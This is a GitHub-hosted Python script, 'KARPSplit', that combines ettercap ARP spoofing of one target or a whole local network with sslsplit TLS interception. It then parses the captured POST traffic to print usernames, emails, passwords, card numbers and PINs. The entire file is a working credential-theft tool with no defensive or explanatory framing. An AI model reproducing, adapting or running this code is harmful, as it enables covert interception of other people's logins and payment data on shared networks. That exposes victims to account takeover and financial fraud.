karpsplit/karpsplit.py at master · CodeFusion/karpsplit · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
from subprocess import Popen, PIPE, DEVNULL
import netifaces
import re
import time
import sys
import os
import signal


def karpspoof():
    def arpspoof(target = None):
        gws = netifaces.gateways()
        gateway = gws['default'][netifaces.AF_INET][0]
        print("Using gateway " + gateway)
        if target is None:
            spoofer = Popen(["ettercap", "-T", "-M", "ARP", "-S", "-o", "///", "/"+gateway+"//"], stdout=DEVNULL, stderr=PIPE)
        else:
            spoofer = Popen(["ettercap", "-T", "-M", "ARP", "-S", "-o", "/"+target+"//", "/"+gateway+"//"], stdout=DEVNULL, stderr=PIPE)
        while 1:
            line = spoofer.stderr.readline()
            if line:
                if line.find(b"(press 'q' to exit)"):
                    print("ARP Spoofing active")
                    break
        return spoofer

    def sslsplit():
        splitter = Popen(["sslsplit", "-k", "<INTERMEDIATE KEY>", "-c", "<INTERMEDIATE CERTIFICATE>", "-C", "<CA CHAIN>", "-L", "connections.txt", "ssl", "0.0.0.0", "8443"], stdin=PIPE, universal_newlines=True, stdout=DEVNULL, stderr=DEVNULL)
        return splitter

    def read_output():
        f = open("/root/sslsplit/connections.txt", 'r', encoding="ISO-8859-2")

        # https://regex101.com/r/wA9oY4/1

        # infinite loop
        while 1:
            # read all new data if any is available
            conn_details = f.read()
            # if there is new data
            if conn_details != "":
                p = re.compile("(POST)(.*?)(?=GET|POST|\Z)", re.DOTALL)
                results = re.findall(p, conn_details)
                # for every result
                for result in results:
                    q = re.compile("(?:&|\?|\s)((?:user|email|newcard|card|pin|pass|psw|sid).{0,16}?)=(.*?)(?=&|\s)", re.DOTALL | re.IGNORECASE)
                    deets = re.findall(q, result[1])
                    # if credentials are detected
                    if len(deets) > 0:
                        r = re.compile("Host: (.*?)\s")
                        host = re.search(r, result[1])
                        if "bing" not in host.group():
                            # print the host
                            print(host.group().strip())
                            # print the credentials
                            for deet in deets:
                                print(deet[0] + ": " + deet[1])
                            # print a new line
                            print()

    def handle_sigint(signal, frame):
        print("Stopping ARP Spoofer...")
        spoofer.send_signal(2)
        spoofer.wait(5)
        print("Exiting SSLSplit...")
        splitter.stdin.write("q")
        splitter.wait(5)
        quit()

    signal.signal(signal.SIGINT, handle_sigint)

    print("\nKARPSplit v0.5\n")

    exit = 0

    if len(sys.argv) > 1:
        print("Starting ARP Spoof on " + sys.argv[1] + "... ")
        spoofer = arpspoof(sys.argv[1])
    else:
        print("Starting ARP Spoof on all devices... ")
        spoofer = arpspoof()
    print("Starting SSLSplit... ")
    splitter = sslsplit()
    print("Scanning for credentials\n")
    read_output()

if __name__ == '__main__':
    karpspoof()